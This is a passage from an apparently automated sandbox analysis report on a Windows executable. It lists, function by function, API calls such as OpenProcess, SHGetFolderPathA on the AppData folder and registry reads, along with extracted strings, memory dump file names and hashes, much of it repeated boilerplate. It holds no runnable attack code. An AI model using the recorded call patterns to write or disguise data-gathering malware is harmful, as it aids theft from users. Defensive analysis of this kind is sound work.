                          • RegCloseKey.ADVAPI32(?), ref: 007F31B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: f5d7d0548a557df6dc394b307fac69d156a2d797c1679a98903a5241ad62f794
                          • Instruction ID: 97d8b67edad0e2f2be0107fb34c9a061b3b6dd255d1307b0019ca88c5861b5c4
                          • Opcode Fuzzy Hash: f5d7d0548a557df6dc394b307fac69d156a2d797c1679a98903a5241ad62f794
                          • Instruction Fuzzy Hash: 991130B6A40209AFD710DFD4DD45FBBBBBCE748711F004119FA05D3680DB75590687A1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: a887b70971050cce9f4654d6b9123b4be448c0c0caa80e5aafb52c08134e5add
                          • Instruction ID: 8fb9b73899149caa57ca3b7ea59b78e97dff80ca2a686387fa38e981b810026d
                          • Opcode Fuzzy Hash: a887b70971050cce9f4654d6b9123b4be448c0c0caa80e5aafb52c08134e5add
                          • Instruction Fuzzy Hash: 4D41E77150475CAEDB318B248C89FFB7BFCAF45704F1444E8EB9686282E2759A45CF60
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007D8996
                            • Part of subcall function 007FA1C0: std::exception::exception.LIBCMT ref: 007FA1D5
                            • Part of subcall function 007FA1C0: std::exception::exception.LIBCMT ref: 007FA1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 007D89CD
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA188
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: invalid string position$string too long
                          • API String ID: 2002836212-4289949731
                          • Opcode ID: 8c52bd1df2e14a050264664bdd460362551216572ef5c49f6bb01f06536f5e6b
                          • Instruction ID: ee0f79ef103929daba088624d8206313e38add8a193d401e3f9916084a535026
                          • Opcode Fuzzy Hash: 8c52bd1df2e14a050264664bdd460362551216572ef5c49f6bb01f06536f5e6b
                          • Instruction Fuzzy Hash: D221D6B23002509BC7609A5CE850A6AF7B9DBA1761B15093FF195CB381DB75EC41C3A7
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007D8883
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA188
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 49b5f599c47f98e8c7d4159936a63c8f57bac45bd77211475b230d08b4f13c5f
                          • Instruction ID: bb935c6bb06e2c85066d608ae4d11916271ac96793814758bccdd5cbf0a2f27d
                          • Opcode Fuzzy Hash: 49b5f599c47f98e8c7d4159936a63c8f57bac45bd77211475b230d08b4f13c5f
                          • Instruction Fuzzy Hash: 7631C9B5E005199FCB08DF58C8906AEBBB6EB88310F148269E915DF384DB34AD01CBD1
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007F5922
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA188
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA1AE
                          • std::_Xinvalid_argument.LIBCPMT ref: 007F5935
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_std::exception::exception
                          • String ID: Sec-WebSocket-Version: 13$string too long
                          • API String ID: 1928653953-3304177573
                          • Opcode ID: 300b0e4ab7cfdfb3767690ec4d685c95c35faebc97cb2711c956ca508baf4d0f
                          • Instruction ID: 38aee257467935112a04d9f016b01bcfc000405b821cb5476be0544faa63323a
                          • Opcode Fuzzy Hash: 300b0e4ab7cfdfb3767690ec4d685c95c35faebc97cb2711c956ca508baf4d0f
                          • Instruction Fuzzy Hash: 0E117030314B44CBC725CB2CE80072977E5AB91760F250A5EE3E187796D7A9E841C7A1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,007FA430,000000FF), ref: 007F3D20
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F3D27
                          • wsprintfA.USER32 ref: 007F3D37
                            • Part of subcall function 007F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007F71FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 67fcda3089a7805a53df76d2d98172c8da33dcff96d5b3535ae4fd7626c86109
                          • Instruction ID: 1029943078947d80a00b109fdd82289f222d31716aab428af08b87f5c60d0017
                          • Opcode Fuzzy Hash: 67fcda3089a7805a53df76d2d98172c8da33dcff96d5b3535ae4fd7626c86109
                          • Instruction Fuzzy Hash: 9D01C071A40708BBE7109F94DC0AF6BBB78FB45B61F000115FA05973D0C7B81902CAA6
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007D8737
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA188
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 7ae123731202f063fa5cac114e15f5716949b4941484f524387fa604d6ac8a27
                          • Instruction ID: ed3b59fc4b906f627391b732f4dbaa02cb930c733996f683f9bb18354defde9d
                          • Opcode Fuzzy Hash: 7ae123731202f063fa5cac114e15f5716949b4941484f524387fa604d6ac8a27
                          • Instruction Fuzzy Hash: D2F02433F000311F8394647D8C8509FA82796E43A033AD722E95AEF399EC34EC8281D2
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007EE544
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE573
                          • lstrcat.KERNEL32(?,00000000), ref: 007EE581
                          • lstrcat.KERNEL32(?,0125DE10), ref: 007EE59C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 124e18745f1c77aa9fae578b8da6c11fb58b71d7fcdb371362f01740ac77569e
                          • Instruction ID: 643f1e72326fd4246ba512ef5c280a79bca9aae5cc2756b395f0204cd30ff01c
                          • Opcode Fuzzy Hash: 124e18745f1c77aa9fae578b8da6c11fb58b71d7fcdb371362f01740ac77569e
                          • Instruction Fuzzy Hash: E55195B1A1011CEBD755EB94DC46EEE33BDEB88300F444469BA0697342DA78AE478B91
                          APIs
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 007F1FDF, 007F1FF5, 007F20B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: strlen
                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 39653677-4138519520
                          • Opcode ID: 76fe46cc7e80bc8aaf78569eca1f7e3faafe8e47fb4080d5841cea13888cf6f5
                          • Instruction ID: 651a6d62b2e207b55f83d7dd2a65d5bf5cc53d77d547c60ef2f26a94cb698059
                          • Opcode Fuzzy Hash: 76fe46cc7e80bc8aaf78569eca1f7e3faafe8e47fb4080d5841cea13888cf6f5
                          • Instruction Fuzzy Hash: 0A21283651028E8AD720EA75C8447FDF766EF803A1F844056CA194B383EB3A190BD796
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007EEBB4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EEBE3
                          • lstrcat.KERNEL32(?,00000000), ref: 007EEBF1
                          • lstrcat.KERNEL32(?,0125E538), ref: 007EEC0C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: b6dd6e199f0d74ed7f2054ba3449244750c5688c44bcd42741a41d4f96b557c4
                          • Instruction ID: 31e811f844317fcaee25afa1196c6ce674355c25d6267e2506feb22625594ba9
                          • Opcode Fuzzy Hash: b6dd6e199f0d74ed7f2054ba3449244750c5688c44bcd42741a41d4f96b557c4
                          • Instruction Fuzzy Hash: 60318671A1011CDBCB21EFA4DC45BEE73B8EF98300F1054A9BA46A7351DE389E478B94
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000), ref: 007F4492
                          • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 007F44AD
                          • CloseHandle.KERNEL32(00000000), ref: 007F44B4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F44E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                          • String ID:
                          • API String ID: 4028989146-0
